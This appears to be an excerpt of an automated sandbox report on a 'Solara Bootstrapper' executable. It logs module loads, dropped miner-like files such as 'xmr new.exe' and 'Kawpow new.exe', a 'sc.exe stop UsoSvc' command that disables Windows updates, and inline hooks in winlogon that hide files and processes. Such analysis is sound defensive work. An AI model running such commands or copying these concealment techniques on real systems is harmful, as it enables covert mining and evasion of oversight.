Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Solara Bootstrapper.exeStatic file information: File size 10967040 > 1048576
Source: Solara Bootstrapper.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xa74800
Source: Binary string: T].PdBB?0_$u3J~7 source: Solara Bootstrapper.exe, 00000000.00000002.2100460502.0000000003887000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp
Source: SolaraBootstrapper.exe.0.drStatic PE information: 0x9EA529E4 [Tue May 5 20:04:52 2054 UTC]
Source: xmr new.exe.4.drStatic PE information: section name: .00cfg
Source: Kawpow new.exe.4.drStatic PE information: section name: .00cfg
Source: eejhedztifcv.exe.9.drStatic PE information: section name: .00cfg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0443633D pushad ; ret 1_2_04436351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04430CC0 push eax; ret 1_2_04430CCA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04430CD0 push eax; ret 1_2_04430CDA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04430CE0 push eax; ret 1_2_04430CEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04430C80 push eax; ret 1_2_04430CBA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_06FE3E04 push ecx; retn 8564h1_2_06FE3E13
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_081577B8 push eax; iretd 1_2_081577B9
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A497EACDD push rcx; retf 003Fh2_2_0000019A497EACDE
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A4981C6DD push rcx; retf 003Fh2_2_0000019A4981C6DE
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 5_2_00EB06E0 push eax; ret 5_2_00EB06EA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 5_2_00EB06F0 push eax; ret 5_2_00EB06FA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 5_2_00EB06D0 push eax; ret 5_2_00EB06DA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 5_2_00EB06B0 push eax; ret 5_2_00EB06CA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 5_2_00EB0669 push eax; ret 5_2_00EB066A
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 5_2_00EB0677 push eax; ret 5_2_00EB067A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04F9636B pushad ; ret 7_2_04F96371
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04F90FB8 push eax; ret 7_2_04F90FC2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04F90FA8 push eax; ret 7_2_04F90FB2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04F90F98 push eax; ret 7_2_04F90FA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04F90F6A push eax; ret 7_2_04F90F92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04F90F28 push eax; ret 7_2_04F90F42
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04F96F1C pushad ; ret 7_2_04F96F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_07E515B4 push FFFFFF8Bh; iretd 7_2_07E515B6
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C52ACDD push rcx; retf 003Fh15_2_000001F43C52ACDE
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C55C6DD push rcx; retf 003Fh15_2_000001F43C55C6DE
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E85899ACDD push rcx; retf 003Fh53_2_000001E85899ACDE
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E8589CC6DD push rcx; retf 003Fh53_2_000001E8589CC6DE
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140ADFDACDD push rcx; retf 003Fh68_2_00000140ADFDACDE
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140AE87C6DD push rcx; retf 003Fh68_2_00000140AE87C6DE
Source: C:\Users\user\AppData\Local\Temp\kx new.exeFile created: C:\Users\user\AppData\Local\Temp\xmr new.exeJump to dropped file
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeFile created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeJump to dropped file
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\kx new.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kx new.exeFile created: C:\Users\user\AppData\Local\Temp\Kawpow new.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeFile created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

barindex
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
